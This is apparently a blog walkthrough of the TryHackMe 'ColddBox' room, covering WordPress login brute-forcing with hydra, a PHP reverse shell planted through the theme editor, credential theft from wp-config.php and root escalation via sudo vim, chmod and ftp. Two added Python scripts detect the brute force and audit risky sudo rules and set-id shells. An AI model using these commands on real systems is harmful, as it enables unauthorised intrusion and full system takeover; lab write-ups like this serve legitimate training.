ColddBox — TryHackMe Walkthrough

Advait Jadhav
4 min read, Mar 21, 2024


ColddBox

Hello! Today I am solving ‘ColddBox’ on TryHackMe.

This is an easy-rated box that can be compromised by brute-forcing the WordPress CMS login.

Room Link: https://tryhackme.com/r/room/colddboxeasy

Let's get started!

I'll start off by adding the target IP address to the /etc/hosts file.

Step 0: Reconnaissance

To enumerate the host for open ports I'll use Nmap (Network Mapper).

We get two open ports; let's enumerate those further.

Brief

  1. 80/tcp — HTTP — running an Apache 2.4.18 web server with the WordPress CMS.
  2. 4512/tcp — SSH — used to access the system remotely.

Step 1: Web Exploitation

Let's fire up the browser and check the website for any clues.

Seems like a normal website; nothing fishy in the source code either.

Since it's running WordPress, we can use wpscan to enumerate the site for useful information such as usernames and known vulnerabilities that can be used in exploitation.

wpscan --url http://coldd.thm -e vp,vt,u -o logs/wpscan -f cli-no-colour

The above command enumerates the CMS for vulnerable plugins (vp), vulnerable themes (vt) and usernames (u).

wpscan identified 4 users, but we'll omit the first one since WordPress doesn't allow spaces in usernames (it's a false positive). Let's put the rest in a list and brute-force them with hydra.

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt coldd.thm -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -F

I'm using the -F switch to stop hydra once a valid credential pair is found.
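From the defender's side, the hydra run above is loud in the web server's access log: a burst of POSTs to /wp-login.php from one source, answered with 200 while guesses fail and with a redirect (the Location header that hydra's S=Location condition waits for) once one succeeds. The Python script below is an added example, not part of the original walkthrough or the room; it parses Apache combined-format log lines and flags that pattern. The log lines are constructed for the demonstration, and the threshold and window values are assumptions to tune for a real site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def detect_wp_bruteforce(log_text, threshold=10, window_seconds=60):
    """Flag every client that sent at least `threshold` POSTs to /wp-login.php
    inside any `window_seconds` window. `success_seen` is set when one of those
    POSTs was answered with a 3xx redirect, the response a successful WordPress
    login produces and the one hydra's S=Location condition keys on."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, status = parsed
        if method == "POST" and path.split("?", 1)[0] == "/wp-login.php":
            attempts[ip].append((ts, status))

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, events in attempts.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[ip] = {
                "attempts": len(events),
                "max_in_window": best,
                "success_seen": any(300 <= s < 400 for _, s in events),
                "first": events[0][0],
                "last": events[-1][0],
            }
    return alerts


# --- constructed sample log, not a capture from the room --------------------
def _line(ip, ts, method, path, status):
    return (f'{ip} - - [{ts:%d/%b/%Y:%H:%M:%S +0000}] '
            f'"{method} {path} HTTP/1.1" {status} 1234 "-" "Mozilla/5.0"')


_base = datetime(2024, 3, 21, 10, 0, 0)
_lines = []
# Attacker: 12 guesses three seconds apart, the last one answered with a redirect.
for _i in range(12):
    _lines.append(_line("10.0.0.5", _base + timedelta(seconds=3 * _i),
                        "POST", "/wp-login.php", 302 if _i == 11 else 200))
# The same host fetching the 404 page afterwards: not a login attempt, ignored.
_lines.append(_line("10.0.0.5", _base + timedelta(seconds=60), "GET", "/?p=777", 404))
# A legitimate admin: one typo, then a successful login, minutes apart.
_lines.append(_line("192.168.1.20", _base + timedelta(minutes=5), "POST", "/wp-login.php", 200))
_lines.append(_line("192.168.1.20", _base + timedelta(minutes=7), "POST", "/wp-login.php", 302))
SAMPLE_LOG = "\n".join(_lines)

if __name__ == "__main__":
    for ip, report in detect_wp_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {report['attempts']} login POSTs, "
              f"{report['max_in_window']} within 60s, "
              f"success seen: {report['success_seen']}")
```

The sliding window keeps a legitimate admin who mistypes a password once from tripping the alert, while a burst followed by a redirect is the strongest signal that a credential was actually recovered and the account should be reset.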

Gottem! Now let's log in and get access to the CMS.

Now that we have access to the CMS, let's try uploading our malicious PHP reverse shell.

We'll do this by going to the theme editor (Appearance > Editor) and replacing the 404 page's code with our reverse shell's code.

Now update the file.

Step 2: Compromising the system

Now that our reverse shell code is on the web server, set up a netcat listener and then request the 404 page (request any page that doesn't exist on the site; ?p=777 in this case).

curl -L http://coldd.thm/?p=777

And we get a shell!

But first, let's stabilise it.

python3 -c 'import pty; pty.spawn("/bin/bash")'; export TERM=xterm

<CTRL + Z>

stty raw -echo; fg

Let's grab the user flag.

We need to do a horizontal privilege escalation to the user c0ldd.

Let's go back to the web application's directory and search for credentials inside the config files.

Easy catch!

grep -A 5 -B 5 pass wp-config.php

Let's switch user and grab the first flag.

One down! Let's grab the other one.

Step 3: Privilege Escalation

Let's vertically escalate our privileges now.

Right off the bat we'll check which commands the current user can run as root with the sudo -l command.

Three commands, three paths to root. Let's explore each one by one.

Vim

sudo vim -c ':!/bin/bash'

chmod

sudo chmod 6777 /bin/bash
/bin/bash -p

ftp

sudo ftp
!/bin/bash
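Each of these three sudo rules is a misconfiguration a defender can catch before anyone gets a shell, and the chmod path also leaves a durable artifact behind: a root-owned, world-writable, set-id /bin/bash. The Python below is an added example, not code from the room or the walkthrough; it audits `sudo -l` output for the three binaries the page names and classifies set-id files found on disk. The `sudo -l` sample is constructed, and SHELL_NAMES and the default directory list are assumptions.

```python
import os
import re
import stat

# The three sudo-allowed binaries the walkthrough turns into a root shell.
# This is the page's set, not an exhaustive list; extend it from your own review.
SHELL_ESCAPE_BINARIES = {"vim", "chmod", "ftp"}

# Assumption: the interactive shells worth flagging when found with a set-id bit.
SHELL_NAMES = {"bash", "sh", "dash", "zsh"}

# Rule lines of `sudo -l` look like "    (root) NOPASSWD: /usr/bin/vim, /bin/chmod".
SUDO_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudo_rules(sudo_l_output):
    """Return the commands in `sudo -l` output that run as root and are either
    ALL or one of SHELL_ESCAPE_BINARIES, with whether a password is required."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        runas_user = m["runas"].split(":")[0].strip()  # "(root : root)" -> "root"
        if runas_user not in ("root", "ALL"):
            continue
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES:
                findings.append({"command": cmd, "nopasswd": "NOPASSWD" in m["tags"]})
    return findings


def classify_setid_file(path, mode, uid):
    """Given a file's st_mode and st_uid, return None when no set-id bit is set,
    otherwise the list of reasons it is dangerous (empty for an ordinary set-id
    binary such as /usr/bin/passwd)."""
    if not mode & (stat.S_ISUID | stat.S_ISGID):
        return None
    reasons = []
    if uid == 0 and os.path.basename(path) in SHELL_NAMES:
        reasons.append("set-id bit on a root-owned shell")
    if mode & stat.S_IWOTH:
        reasons.append("set-id file is world-writable")
    return reasons


def scan_setid(roots=("/bin", "/usr/bin", "/sbin", "/usr/sbin")):
    """Walk `roots` (an assumed default list) and return (path, perms, reasons)
    for every set-id regular file that classify_setid_file considers dangerous."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                reasons = classify_setid_file(path, st.st_mode, st.st_uid)
                if reasons:
                    findings.append((path, oct(st.st_mode & 0o7777), reasons))
    return findings


# Constructed `sudo -l` output modelled on the room; not a capture from it.
SAMPLE_SUDO_L = """\
Matching Defaults entries for c0ldd on ColddBox-Easy:
    env_reset, mail_badpass

User c0ldd may run the following commands on ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
    (root) NOPASSWD: /bin/ls
    (www-data) /usr/bin/php
"""

if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"sudo rule grants a root shell via: {f['command']} (NOPASSWD={f['nopasswd']})")
    for path, perms, reasons in scan_setid():
        print(f"{path} {perms}: {'; '.join(reasons)}")
```

Run the set-id scan as part of a periodic integrity check: an ordinary set-id binary like passwd produces an empty reason list and is ignored, whereas a mode-6777 root shell is reported twice over, once for being a set-id shell and once for being world-writable.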

Conclusion

ColddBox is an easy-rated room that can be rooted by brute-forcing the weak credentials used for the WordPress CMS.
